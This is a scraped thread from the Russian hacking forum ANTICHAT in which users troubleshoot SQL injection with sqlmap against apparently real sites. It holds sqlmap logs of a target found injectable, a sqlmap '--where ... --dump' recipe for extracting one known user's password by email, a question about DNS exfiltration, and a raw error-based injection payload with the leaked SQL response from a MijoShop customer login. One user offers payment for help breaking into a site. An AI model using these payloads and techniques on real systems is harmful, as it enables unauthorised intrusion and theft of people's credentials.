ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.12.2016, 10:58
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
Сообщение от kacergei
↑
Это понятно, но проблема в том что с csv при дампе не пишется тип колонок int,varchar и т.д.
посмотри какие колонки в логе
|
|
|
21.12.2016, 11:00
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от brown
↑
посмотри какие колонки в логе
Да это все ясно, но ситуация в том что больше 100 таблиц и в каждой бывает до 40-50 колонок
а в ручную зае.... собирать
Потому и думал что может есть решение куда проще
|
|
|
|
23.12.2016, 13:31
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
Код:
12:22:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:22:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:22:47] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[12:22:50] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[12:22:53] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
[12:25:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[12:25:10] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[12:25:13] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[12:25:16] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[12:25:20] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[12:25:23] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[12:25:26] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[12:25:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:25:33] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[12:25:36] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[12:25:39] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[12:27:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[12:27:55] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[12:27:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[12:28:01] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[12:28:06] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[12:28:09] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[12:28:13] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[12:28:13] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
Подскажите как прокрутить нормльно,он вроде подсчитал количество
[12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
но потом обломился
И не хочет выдавать информационную схему
[CODE]
[12:28:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL |
|
|
|
23.12.2016, 18:04
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
[QUOTE="brown"]
↑
Код:
12:22:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:22:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:22:47] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[12:22:50] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[12:22:53] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
[12:25:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[12:25:10] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[12:25:13] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[12:25:16] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[12:25:20] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[12:25:23] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[12:25:26] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[12:25:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:25:33] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[12:25:36] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[12:25:39] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[12:27:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[12:27:55] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[12:27:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[12:28:01] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[12:28:06] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[12:28:09] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[12:28:13] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[12:28:13] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
Подскажите как прокрутить нормльно,он вроде подсчитал количество
[12:22:59] [INFO] target URL appears to be UNION injectable with 29 columns
но потом обломился
И не хочет выдавать информационную схему
[CODE]
[12:28:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL |
|
|
|
24.12.2016, 13:30
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
Сообщение от karkajoi
↑
[12:28:13] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
Ложно позитивная жи.
А как раскрутить?Готов заплатить
|
|
|
|
24.12.2016, 22:03
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от brown
↑
А как раскрутить?Готов заплатить
Вручную пробовать, может там вообще нету дыры.
У меня вопрос, если я знаю email конкретного пользователя и мне надо выташить из базы его пароль. Как это сделать? id и прочее не знаю. Тип иньекции boolean-based blind. Можно ли как-то настроить sqlmap чтобы искала конкретный mail и вытаскивала пароль от нее? Т.к база очень большая, полный дамп может затянутся на недели.
|
|
|
|
24.12.2016, 23:58
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
Сообщение от karkajoi
↑
Вручную пробовать, может там вообще нету дыры.
У меня вопрос, если я знаю email конкретного пользователя и мне надо выташить из базы его пароль. Как это сделать? id и прочее не знаю. Тип иньекции boolean-based blind. Можно ли как-то настроить sqlmap чтобы искала конкретный mail и вытаскивала пароль от нее? Т.к база очень большая, полный дамп может затянутся на недели.
дыра есть, ОР болеан таблицы подберает
|
|
|
|
25.12.2016, 00:02
|
|
Познающий
Регистрация: 24.09.2015
Сообщений: 35
Провел на форуме:
11851
Репутация:
30
|
|
Сообщение от karkajoi
↑
Вручную пробовать, может там вообще нету дыры.
У меня вопрос, если я знаю email конкретного пользователя и мне надо выташить из базы его пароль. Как это сделать? id и прочее не знаю. Тип иньекции boolean-based blind. Можно ли как-то настроить sqlmap чтобы искала конкретный mail и вытаскивала пароль от нее? Т.к база очень большая, полный дамп может затянутся на недели.
-C pass --where="email=' admin@mail.com'" --dump
|
|
|
|
28.12.2016, 19:41
|
|
Новичок
Регистрация: 17.11.2016
Сообщений: 3
Провел на форуме:
786
Репутация:
0
|
|
Пытаюсь заюзать уязвимость через sqlmap time based методом, но процесс очень медленно протекает. В общем нужно попробовать через DNS exfiltration.
Подскажите, пожалуйста, если кто настраивал как поднять днс и настроить, чтобы можно было использовать --dns-domain
|
|
|
|
03.01.2017, 10:24
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
Код:
-------Boundary_NTHBPFPLPE
Content-Disposition: form-data; name="email"
sample@email.tst
-------Boundary_NTHBPFPLPE
Content-Disposition: form-data; name="password"
'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
-------Boundary_NTHBPFPLPE--
Response
HTTP/1.1 500 Duplicate entry '4CunQ7pfmop1' for key 'group_key' SQL=SELECT * FROM #__mijoshop_customer WHERE LOWER(email) = 'sample@email.tst' AND (password = SHA1(CONCAT(salt, SHA1(CONCAT(salt, SHA1('\'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\''))))) OR password = '55a651117e240d7021e2bc35bb379d7e' OR password = ''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'' OR password = ''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR(81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(111),CHAR(112)) from information_schemaCache-Control: no-cache
Server: nginx
Date: Fri, 30 Dec 2016 12:49:40 GMT
Content-Type: text/html
Почему мап не цепляет? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
